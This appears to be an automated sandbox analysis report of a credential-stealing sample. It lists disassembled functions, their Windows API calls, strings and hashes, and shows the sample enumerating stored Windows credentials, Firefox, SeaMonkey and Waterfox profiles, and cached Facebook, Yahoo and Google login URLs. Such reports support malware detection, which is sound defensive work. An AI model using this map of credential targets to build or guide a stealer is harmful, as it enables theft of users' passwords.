                                                • Not Executed
                                                control_flow_graph 762 40e175-40e1a1 call 40695d call 406b90 767 40e1a7-40e1e5 memset 762->767 768 40e299-40e2a8 call 4069a3 762->768 770 40e1e8-40e1fa call 406e8f 767->770 774 40e270-40e27d call 406b53 770->774 775 40e1fc-40e219 call 40dd50 * 2 770->775 774->770 780 40e283-40e286 774->780 775->774 786 40e21b-40e21d 775->786 783 40e291-40e294 call 40aa04 780->783 784 40e288-40e290 ??3@YAXPAX@Z 780->784 783->768 784->783 786->774 787 40e21f-40e235 call 40742e 786->787 787->774 790 40e237-40e242 call 40aae3 787->790 790->774 793 40e244-40e26b _snwprintf call 40a8d0 790->793 793->774
                                                APIs
                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                • memset.MSVCRT ref: 0040E1BD
                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                • _snwprintf.MSVCRT ref: 0040E257
                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                • API String ID: 3883404497-2982631422
                                                • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                • memset.MSVCRT ref: 0040BC75
                                                • memset.MSVCRT ref: 0040BC8C
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                • memcmp.MSVCRT ref: 0040BCD6
                                                • memcpy.MSVCRT ref: 0040BD2B
                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                • String ID:
                                                • API String ID: 509814883-3916222277
                                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 847 41837f-4183bf 848 4183c1-4183cc call 418197 847->848 849 4183dc-4183ec call 418160 847->849 854 4183d2-4183d8 848->854 855 418517-41851d 848->855 856 4183f6-41840b 849->856 857 4183ee-4183f1 849->857 854->849 858 418417-418423 856->858 859 41840d-418415 856->859 857->855 860 418427-418442 call 41739b 858->860 859->860 863 418444-41845d CreateFileW 860->863 864 41845f-418475 CreateFileA 860->864 865 418477-41847c 863->865 864->865 866 4184c2-4184c7 865->866 867 41847e-418495 GetLastError ??3@YAXPAX@Z 865->867 870 4184d5-418501 memset call 418758 866->870 871 4184c9-4184d3 866->871 868 4184b5-4184c0 call 444706 867->868 869 418497-4184b3 call 41837f 867->869 868->855 869->855 877 418506-418515 ??3@YAXPAX@Z 870->877 871->870 877->855
                                                APIs
                                                • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                • GetLastError.KERNEL32 ref: 0041847E
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: CreateFile$??3@ErrorLast
                                                • String ID: |A
                                                • API String ID: 1407640353-1717621600
                                                • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                • String ID: r!A
                                                • API String ID: 2791114272-628097481
                                                • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                • _wcslwr.MSVCRT ref: 0040C817
                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                • wcslen.MSVCRT ref: 0040C82C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                • API String ID: 62308376-4196376884
                                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                • wcslen.MSVCRT ref: 0040BE06
                                                • _wcsncoll.MSVCRT ref: 0040BE38
                                                • memset.MSVCRT ref: 0040BE91
                                                • memcpy.MSVCRT ref: 0040BEB2
                                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                • wcschr.MSVCRT ref: 0040BF24
                                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                • String ID:
                                                • API String ID: 3191383707-0
                                                • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 00403CBF
                                                • memset.MSVCRT ref: 00403CD4
                                                • memset.MSVCRT ref: 00403CE9
                                                • memset.MSVCRT ref: 00403CFE
                                                • memset.MSVCRT ref: 00403D13
                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                • memset.MSVCRT ref: 00403DDA
                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                • String ID: Waterfox$Waterfox\Profiles
                                                • API String ID: 3527940856-11920434
                                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 00403E50
                                                • memset.MSVCRT ref: 00403E65
                                                • memset.MSVCRT ref: 00403E7A
                                                • memset.MSVCRT ref: 00403E8F
                                                • memset.MSVCRT ref: 00403EA4
                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                • memset.MSVCRT ref: 00403F6B
                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                • API String ID: 3527940856-2068335096
                                                • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 00403FE1
                                                • memset.MSVCRT ref: 00403FF6
                                                • memset.MSVCRT ref: 0040400B
                                                • memset.MSVCRT ref: 00404020
                                                • memset.MSVCRT ref: 00404035
                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                • memset.MSVCRT ref: 004040FC
                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                • API String ID: 3527940856-3369679110
                                                • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy
                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                • API String ID: 3510742995-2641926074
                                                • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                • memset.MSVCRT ref: 004033B7
                                                • memcpy.MSVCRT ref: 004033D0
                                                • wcscmp.MSVCRT ref: 004033FC
                                                • _wcsicmp.MSVCRT ref: 00403439
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                • String ID: $0.@
                                                • API String ID: 3030842498-1896041820
                                                • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                • String ID:
                                                • API String ID: 2941347001-0
                                                • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 00403C09
                                                • memset.MSVCRT ref: 00403C1E
                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                • wcscat.MSVCRT ref: 00403C47
                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                • wcscat.MSVCRT ref: 00403C70
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memsetwcscat$Closewcscpywcslen
                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                • API String ID: 3249829328-1174173950
                                                • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0040A824
                                                • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                • wcscpy.MSVCRT ref: 0040A854
                                                • wcscat.MSVCRT ref: 0040A86A
                                                • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                • String ID:
                                                • API String ID: 669240632-0
                                                • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                Download Yara Rule
                                                APIs
                                                • wcschr.MSVCRT ref: 00414458
                                                • _snwprintf.MSVCRT ref: 0041447D
                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                • String ID: "%s"
                                                • API String ID: 1343145685-3297466227
                                                • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
